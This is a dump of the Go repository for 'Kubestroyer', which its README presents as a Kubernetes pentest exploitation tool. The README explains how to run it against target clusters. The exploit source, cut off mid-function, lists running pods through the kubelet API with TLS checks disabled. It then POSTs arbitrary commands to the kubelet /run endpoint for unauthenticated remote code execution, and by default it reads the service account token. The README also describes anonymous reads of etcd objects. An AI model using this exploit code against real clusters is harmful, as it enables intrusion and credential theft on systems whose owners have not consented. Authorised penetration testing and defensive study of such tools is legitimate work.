Repository: Rolix44/Kubestroyer
Branch: master
Commit: 74b074ead724
Files: 12
Total size: 31.4 KB
Directory structure:
gitextract_ggafct49/
├── .gitignore
├── LICENSE.txt
├── README.md
├── cmd/
│ └── kubestroyer/
│ └── main.go
├── go.mod
├── go.sum
├── pkg/
│ ├── cmd.go
│ ├── expoit.go
│ └── scanning.go
└── utils/
├── config.go
├── display.go
└── ports.go
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
.idea
================================================
FILE: LICENSE.txt
================================================
MIT License
Copyright (c) 2023 Rolix
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
<!-- Improved compatibility of back to top link: See: https://github.com/othneildrew/Best-README-Template/pull/73 -->
<a name="readme-top"></a>
<!--
*** Thanks for checking out the Best-README-Template. If you have a suggestion
*** that would make this better, please fork the repo and create a pull request
*** or simply open an issue with the tag "enhancement".
*** Don't forget to give the project a star!
*** Thanks again! Now go create something AMAZING! :D
-->
<!-- PROJECT SHIELDS -->
<!--
*** I'm using markdown "reference style" links for readability.
*** Reference links are enclosed in brackets [ ] instead of parentheses ( ).
*** See the bottom of this document for the declaration of the reference variables
*** for contributors-url, forks-url, etc. This is an optional, concise syntax you may use.
*** https://www.markdownguide.org/basic-syntax/#reference-style-links
-->
<div align="center">
[![Contributors][contributors-shield]][contributors-url]
[![Forks][forks-shield]][forks-url]
[![Stargazers][stars-shield]][stars-url]
[![Issues][issues-shield]][issues-url]
[![MIT License][license-shield]][license-url]
</div>
<!-- PROJECT LOGO -->
<br />
<div align="center">
<a href="https://github.com/Rolix44/Kubestroyer">
<img src=".github/logo.png" alt="Logo" width="80" height="80">
</a>
<h3 align="center">Kubestroyer</h3>
<p align="center">
Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests
<br />
<a href="https://github.com/Rolix44/Kubestroyer"><strong>Explore the docs »</strong></a>
<br />
<br />
<a href="https://github.com/Rolix44/Kubestroyer/issues">Report Bug</a>
·
<a href="https://github.com/Rolix44/Kubestroyer/issues">Request Feature</a>
</p>
</div>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li>
<a href="#about-the-project">About The Project</a>
<ul>
<li><a href="#built-with">Built With</a></li>
</ul>
</li>
<li>
<a href="#getting-started">Getting Started</a>
<ul>
<li><a href="#prerequisites">Prerequisites</a></li>
<li><a href="#installation">Installation</a></li>
</ul>
</li>
<li><a href="#usage">Usage</a></li>
<li><a href="#roadmap">Roadmap</a></li>
<li><a href="#contributing">Contributing</a></li>
<li><a href="#license">License</a></li>
<li><a href="#contact">Contact</a></li>
</ol>
</details>
<!-- ABOUT THE PROJECT -->
## About The Project
[![Product Name Screen Shot][product-screenshot]]()
**Kubestroyer** is a Golang exploitation tool that aims to take advantage of Kubernetes clusters misconfigurations.
The tool is scanning known Kubernetes ports that can be exposed as well as exploiting them.
<p align="right">(<a href="#readme-top">back to top</a>)</p>
### Built With
<br>
[![Golang][Golang]][Golang-url]
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- GETTING STARTED -->
## Getting Started
To get a local copy up and running, follow these simple example steps.
### Prerequisites
* Go 1.19
```sh
wget https://go.dev/dl/go1.19.4.linux-amd64.tar.gz
tar -C /usr/local -xzf go1.19.4.linux-amd64.tar.gz
```
### Installation
Use [prebuilt binary](https://github.com/Rolix44/Kubestroyer/releases)
**or**
Using go install command :
```sh
$ go install github.com/Rolix44/Kubestroyer@latest
```
**or**
build from source:
1. Clone the repo
```sh
$ git clone https://github.com/Rolix44/Kubestroyer.git
```
2. build the binary
```sh
$ go build -o Kubestroyer cmd/kubestroyer/main.go
```
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- USAGE EXAMPLES -->
## Usage
[![Product usage][usage-gif]]()
| Parameter | Description | Mand/opt | Example |
|--------------|-----------------------------------------------------------------------------|---|------------------------------------------|
| -t / --target | Target (IP, domain or file) | Mandatory | -t localhost,127.0.0.1 / -t ./domain.txt |
| --node-scan | Enable node port scanning (port 30000 to 32767) | Optionnal | -t localhost --node-scan |
| --anon-rce | RCE using Kubelet API anonymous auth | Optionnal | -t localhost --anon-rce |
| -x | Command to execute when using RCE (display service account token by default) | Optionnal | -t localhost --anon-rce -x "ls -al" |
| --etcd | Read wanted objects if etcd anonymous access is enabled | Optionnal | -t localhost --etcd |
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- CURRENT FEATURES -->
## Currently supported features
- Target
- List of multiple targets
- Input file as target
- Scanning
- Known ports scan
- Node port scan (30000 to 32767)
- Port description
- Vulnerabilities
- Annon RCE on Kubelet
- Choose command to execute
- Choose container to execute command in
- Etcd anonymous read
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- ROADMAP -->
## Roadmap
- [x] Choose the pod for anon RCE
- [x] Etcd exploit
- [ ] Kubelet read-only API parsing for information disclosure
See the [open issues](https://github.com/Rolix44/Kubestroyer/issues) for a full list of proposed features (and known issues).
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- CONTRIBUTING -->
## Contributing
Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are **greatly appreciated**.
If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement".
Don't forget to give the project a star! Thanks again!
1. Fork the Project
2. Create your Feature Branch (`git checkout -b feature/AmazingFeature`)
3. Commit your Changes (`git commit -m 'Add some AmazingFeature'`)
4. Push to the Branch (`git push origin feature/AmazingFeature`)
5. Open a Pull Request
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- LICENSE -->
## License
Distributed under the MIT License. See `LICENSE.txt` for more information.
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
Rolix - [@Rolix_cy](https://twitter.com/Rolix_cy) - rolixcy@protonmail.com
Project Link: [https://github.com/Rolix44/Kubestroyer](https://github.com/Rolix44/Kubestroyer)
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- MARKDOWN LINKS & IMAGES -->
<!-- https://www.markdownguide.org/basic-syntax/#reference-style-links -->
[contributors-shield]: https://img.shields.io/github/contributors/Rolix44/Kubestroyer.svg?style=for-the-badge
[contributors-url]: https://github.com/Rolix44/Kubestroyer/graphs/contributors
[forks-shield]: https://img.shields.io/github/forks/Rolix44/Kubestroyer.svg?style=for-the-badge
[forks-url]: https://github.com/Rolix44/Kubestroyer/network/members
[stars-shield]: https://img.shields.io/github/stars/Rolix44/Kubestroyer.svg?style=for-the-badge
[stars-url]: https://github.com/Rolix44/Kubestroyer/stargazers
[issues-shield]: https://img.shields.io/github/issues/Rolix44/Kubestroyer.svg?style=for-the-badge
[issues-url]: https://github.com/Rolix44/Kubestroyer/issues
[license-shield]: https://img.shields.io/github/license/Rolix44/Kubestroyer.svg?style=for-the-badge
[license-url]: https://github.com/Rolix44/Kubestroyer/blob/master/LICENSE.txt
[linkedin-shield]: https://img.shields.io/badge/-LinkedIn-black.svg?style=for-the-badge&logo=linkedin&colorB=555
[Golang]: https://img.shields.io/badge/Golang-0769AD?style=for-the-badge&logo=Go&logoColor=white
[Golang-url]: https://go.dev/
[product-screenshot]: .github/project-name.png
[release]: https://github.com/Rolix44/Kubestroyer/releases/new
[usage-gif]: .github/kubestroyer-usage.gif
================================================
FILE: cmd/kubestroyer/main.go
================================================
package main
import (
"fmt"
"github.com/Rolix44/Kubestroyer/pkg"
"github.com/Rolix44/Kubestroyer/utils"
)
func main() {
fmt.Println("\x1b[1;36m" + utils.Toolname + "\x1b[0m")
fmt.Println(utils.Author)
fmt.Println(utils.Split)
utils.Config()
pkg.Execute()
}
================================================
FILE: go.mod
================================================
module github.com/Rolix44/Kubestroyer
go 1.19
require (
github.com/AlecAivazis/survey/v2 v2.3.7
github.com/pborman/getopt/v2 v2.1.0
go.etcd.io/etcd/client/v3 v3.5.11
go.uber.org/zap v1.27.0
google.golang.org/grpc v1.59.0
)
require (
github.com/coreos/go-semver v0.3.0 // indirect
github.com/coreos/go-systemd/v22 v22.3.2 // indirect
github.com/gogo/protobuf v1.3.2 // indirect
github.com/golang/protobuf v1.5.4 // indirect
github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 // indirect
github.com/mattn/go-colorable v0.1.2 // indirect
github.com/mattn/go-isatty v0.0.8 // indirect
github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b // indirect
go.etcd.io/etcd/api/v3 v3.5.11 // indirect
go.etcd.io/etcd/client/pkg/v3 v3.5.11 // indirect
go.uber.org/multierr v1.11.0 // indirect
golang.org/x/net v0.17.0 // indirect
golang.org/x/sys v0.13.0 // indirect
golang.org/x/term v0.13.0 // indirect; indirects
golang.org/x/text v0.13.0 // indirect
google.golang.org/genproto v0.0.0-20230822172742-b8732ec3820d // indirect
google.golang.org/genproto/googleapis/api v0.0.0-20230822172742-b8732ec3820d // indirect
google.golang.org/genproto/googleapis/rpc v0.0.0-20230822172742-b8732ec3820d // indirect
google.golang.org/protobuf v1.33.0 // indirect
)
================================================
FILE: go.sum
================================================
github.com/AlecAivazis/survey/v2 v2.3.7 h1:6I/u8FvytdGsgonrYsVn2t8t4QiRnh6QSTqkkhIiSjQ=
github.com/AlecAivazis/survey/v2 v2.3.7/go.mod h1:xUTIdE4KCOIjsBAE1JYsUPoCqYdZ1reCfTwbto0Fduo=
github.com/Netflix/go-expect v0.0.0-20220104043353-73e0943537d2 h1:+vx7roKuyA63nhn5WAunQHLTznkw5W8b1Xc0dNjp83s=
github.com/Netflix/go-expect v0.0.0-20220104043353-73e0943537d2/go.mod h1:HBCaDeC1lPdgDeDbhX8XFpy1jqjK0IBG8W5K+xYqA0w=
github.com/coreos/go-semver v0.3.0 h1:wkHLiw0WNATZnSG7epLsujiMCgPAc9xhjJ4tgnAxmfM=
github.com/coreos/go-semver v0.3.0/go.mod h1:nnelYz7RCh+5ahJtPPxZlU+153eP4D4r3EedlOD2RNk=
github.com/coreos/go-systemd/v22 v22.3.2 h1:D9/bQk5vlXQFZ6Kwuu6zaiXJ9oTPe68++AzAJc1DzSI=
github.com/coreos/go-systemd/v22 v22.3.2/go.mod h1:Y58oyj3AT4RCenI/lSvhwexgC+NSVTIJ3seZv2GcEnc=
github.com/creack/pty v1.1.17 h1:QeVUsEDNrLBW4tMgZHvxy18sKtr6VI492kBhUfhDJNI=
github.com/creack/pty v1.1.17/go.mod h1:MOBLtS5ELjhRRrroQr9kyvTxUAFNvYEK993ew/Vr4O4=
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
github.com/godbus/dbus/v5 v5.0.4/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA=
github.com/gogo/protobuf v1.3.2 h1:Ov1cvc58UF3b5XjBnZv7+opcTcQFZebYjWzi34vdm4Q=
github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q=
github.com/golang/protobuf v1.5.4 h1:i7eJL8qZTpSEXOPTxNKhASYpMn+8e5Q6AdndVa1dWek=
github.com/golang/protobuf v1.5.4/go.mod h1:lnTiLA8Wa4RWRcIUkrtSVa5nRhsEGBg48fD6rSs7xps=
github.com/google/go-cmp v0.5.9 h1:O2Tfq5qg4qc4AmwVlvv0oLiVAGB7enBSJ2x2DqQFi38=
github.com/hinshun/vt10x v0.0.0-20220119200601-820417d04eec h1:qv2VnGeEQHchGaZ/u7lxST/RaJw+cv273q79D81Xbog=
github.com/hinshun/vt10x v0.0.0-20220119200601-820417d04eec/go.mod h1:Q48J4R4DvxnHolD5P8pOtXigYlRuPLGl6moFx3ulM68=
github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51 h1:Z9n2FFNUXsshfwJMBgNA0RU6/i7WVaAegv3PtuIHPMs=
github.com/kballard/go-shellquote v0.0.0-20180428030007-95032a82bc51/go.mod h1:CzGEWj7cYgsdH8dAjBGEr58BoE7ScuLd+fwFZ44+/x8=
github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8=
github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck=
github.com/mattn/go-colorable v0.1.2 h1:/bC9yWikZXAL9uJdulbSfyVNIR3n3trXl+v8+1sx8mU=
github.com/mattn/go-colorable v0.1.2/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE=
github.com/mattn/go-isatty v0.0.8 h1:HLtExJ+uU2HOZ+wI0Tt5DtUDrx8yhUqDcp7fYERX4CE=
github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s=
github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b h1:j7+1HpAFS1zy5+Q4qx1fWh90gTKwiN4QCGoY9TWyyO4=
github.com/mgutz/ansi v0.0.0-20170206155736-9520e82c474b/go.mod h1:01TrycV0kFyexm33Z7vhZRXopbI8J3TDReVlkTgMUxE=
github.com/pborman/getopt/v2 v2.1.0 h1:eNfR+r+dWLdWmV8g5OlpyrTYHkhVNxHBdN2cCrJmOEA=
github.com/pborman/getopt/v2 v2.1.0/go.mod h1:4NtW75ny4eBw9fO1bhtNdYTlZKYX5/tBLtsOpwKIKd0=
github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk=
github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY=
go.etcd.io/etcd/api/v3 v3.5.11 h1:B54KwXbWDHyD3XYAwprxNzTe7vlhR69LuBgZnMVvS7E=
go.etcd.io/etcd/api/v3 v3.5.11/go.mod h1:Ot+o0SWSyT6uHhA56al1oCED0JImsRiU9Dc26+C2a+4=
go.etcd.io/etcd/client/pkg/v3 v3.5.11 h1:bT2xVspdiCj2910T0V+/KHcVKjkUrCZVtk8J2JF2z1A=
go.etcd.io/etcd/client/pkg/v3 v3.5.11/go.mod h1:seTzl2d9APP8R5Y2hFL3NVlD6qC/dOT+3kvrqPyTas4=
go.etcd.io/etcd/client/v3 v3.5.11 h1:ajWtgoNSZJ1gmS8k+icvPtqsqEav+iUorF7b0qozgUU=
go.etcd.io/etcd/client/v3 v3.5.11/go.mod h1:a6xQUEqFJ8vztO1agJh/KQKOMfFI8og52ZconzcDJwE=
go.uber.org/goleak v1.3.0 h1:2K3zAYmnTNqV73imy9J1T3WC+gmCePx2hEGkimedGto=
go.uber.org/multierr v1.11.0 h1:blXXJkSxSSfBVBlC76pxqeO+LN3aDfLQo+309xJstO0=
go.uber.org/multierr v1.11.0/go.mod h1:20+QtiLqy0Nd6FdQB9TLXag12DsQkrbs3htMFfDN80Y=
go.uber.org/zap v1.27.0 h1:aJMhYGrd5QSmlpLMr2MftRKl7t8J8PTZPA732ud/XR8=
go.uber.org/zap v1.27.0/go.mod h1:GB2qFLM7cTU87MWRP2mPIjqfIDnGu+VIO4V/SdhGo2E=
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc=
golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4=
golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM=
golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE=
golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE=
golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8=
golang.org/x/term v0.13.0 h1:bb+I9cTfFazGW51MZqBVmZy7+JEJMouUHTUSKVQLBek=
golang.org/x/term v0.13.0/go.mod h1:LTmsnFJwVN6bCy1rVCoS+qHT1HhALEFxKncY3WNNh4U=
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ=
golang.org/x/text v0.4.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8=
golang.org/x/text v0.13.0 h1:ablQoSUd0tRdKxZewP80B+BaqeKJuVhuRxj/dkrun3k=
golang.org/x/text v0.13.0/go.mod h1:TvPlkZtksWOMsz7fbANvkp4WM8x/WCo/om8BMLbz+aE=
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc=
golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
google.golang.org/genproto v0.0.0-20230822172742-b8732ec3820d h1:VBu5YqKPv6XiJ199exd8Br+Aetz+o08F+PLMnwJQHAY=
google.golang.org/genproto v0.0.0-20230822172742-b8732ec3820d/go.mod h1:yZTlhN0tQnXo3h00fuXNCxJdLdIdnVFVBaRJ5LWBbw4=
google.golang.org/genproto/googleapis/api v0.0.0-20230822172742-b8732ec3820d h1:DoPTO70H+bcDXcd39vOqb2viZxgqeBeSGtZ55yZU4/Q=
google.golang.org/genproto/googleapis/api v0.0.0-20230822172742-b8732ec3820d/go.mod h1:KjSP20unUpOx5kyQUFa7k4OJg0qeJ7DEZflGDu2p6Bk=
google.golang.org/genproto/googleapis/rpc v0.0.0-20230822172742-b8732ec3820d h1:uvYuEyMHKNt+lT4K3bN6fGswmK8qSvcreM3BwjDh+y4=
google.golang.org/genproto/googleapis/rpc v0.0.0-20230822172742-b8732ec3820d/go.mod h1:+Bk1OCOj40wS2hwAMA+aCW9ypzm63QTBBHp6lQ3p+9M=
google.golang.org/grpc v1.59.0 h1:Z5Iec2pjwb+LEOqzpB2MR12/eKFhDPhuqW91O+4bwUk=
google.golang.org/grpc v1.59.0/go.mod h1:aUPDwccQo6OTjy7Hct4AfBPD1GptF4fyUjIkQ9YtF98=
google.golang.org/protobuf v1.33.0 h1:uNO2rsAINq/JlFpSdYEKIZ0uKD/R9cpdv0T+yoGwGmI=
google.golang.org/protobuf v1.33.0/go.mod h1:c6P6GXX6sHbq/GpV6MGZEdwhWPcYBgnhAHhKbcUYpos=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY=
gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
================================================
FILE: pkg/cmd.go
================================================
package pkg
import (
"bufio"
"log"
"os"
"strings"
"github.com/Rolix44/Kubestroyer/utils"
)
func Execute() {
_, err := os.Stat(utils.Target)
if err != nil {
utils.Targets = strings.Split(utils.Target, ",")
} else {
file, err := os.Open(utils.Target)
if err != nil {
log.Fatal(err)
}
defer file.Close()
sc := bufio.NewScanner(file)
for sc.Scan() {
utils.Targets = append(utils.Targets, sc.Text())
}
if err := sc.Err(); err != nil {
log.Fatal(err)
}
}
for _, target := range utils.Targets {
if !utils.AnonRce && !utils.ScanEtcd {
checkPorts(target)
}
if utils.AnonRce {
anonRce(target)
}
if utils.ScanEtcd {
readEtcdObjects(target)
}
}
}
================================================
FILE: pkg/expoit.go
================================================
package pkg
import (
"context"
"crypto/tls"
"encoding/json"
"errors"
"fmt"
"github.com/AlecAivazis/survey/v2"
clientv3 "go.etcd.io/etcd/client/v3"
"go.uber.org/zap"
"go.uber.org/zap/zapcore"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/status"
"io"
"log"
"net/http"
"strings"
"time"
"github.com/Rolix44/Kubestroyer/utils"
)
func surveyResult(input []string, message string) []string {
var selectedObjects []string
prompt := &survey.MultiSelect{
Message: message,
Options: input,
}
err := survey.AskOne(prompt, &selectedObjects)
if err != nil {
log.Fatalln("Failed to select :", err)
return nil
}
return selectedObjects
}
func parsePod(target string) *utils.RunningPods {
http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true}
resp, err := http.Get("https://" + target + ":10250/runningpods/")
if err != nil {
log.Fatalf("Fail execute request on '%s'", target)
}
defer resp.Body.Close()
body, err := io.ReadAll(resp.Body)
if err != nil {
fmt.Print("Fail to read body")
}
if string(body) == "Unauthorized" {
log.Fatalln(string(body))
}
if strings.HasPrefix(string(body), "Forbidden") {
log.Fatalln(string(body))
}
pods := &utils.RunningPods{}
err = json.Unmarshal(body, &pods)
if err != nil {
log.Fatalln(err)
}
return pods
}
func anonRce(target string) {
http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true}
runpod := parsePod(target)
var containers []string
for i := 0; i < len(runpod.Items); i++ {
for j := 0; j < len(runpod.Items[i].Spec.Containers); j++ {
containers = append(containers, runpod.Items[i].Spec.Containers[j].Name)
}
}
result := surveyResult(containers, "Select pod to RCE")
fmt.Printf("Trying anon RCE using '%s' for '%s'\n\n", utils.RceCommand, target)
for _, selectedContainer := range result {
for i := 0; i < len(runpod.Items); i++ {
found := false
for j := 0; j < len(runpod.Items[i].Spec.Containers); j++ {
namespace := runpod.Items[i].Metadata.Namespace
pod := runpod.Items[i].Metadata.Name
container := runpod.Items[i].Spec.Containers[j].Name
if selectedContainer != container {
break
}
url := "https://" + target + ":10250/run/" + namespace + "/" + pod + "/" + container
method := "POST"
fmt.Printf("Namespace : '%s' \nPod : '%s' \nContainer : '%s' \n\n", namespace, pod, container)
payload := strings.NewReader("cmd=" + utils.RceCommand)
client := &http.Client{}
req, err := http.NewRequest(method, url, payload)
if err != nil {
fmt.Println(err)
return
}
req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
res, err := client.Do(req)
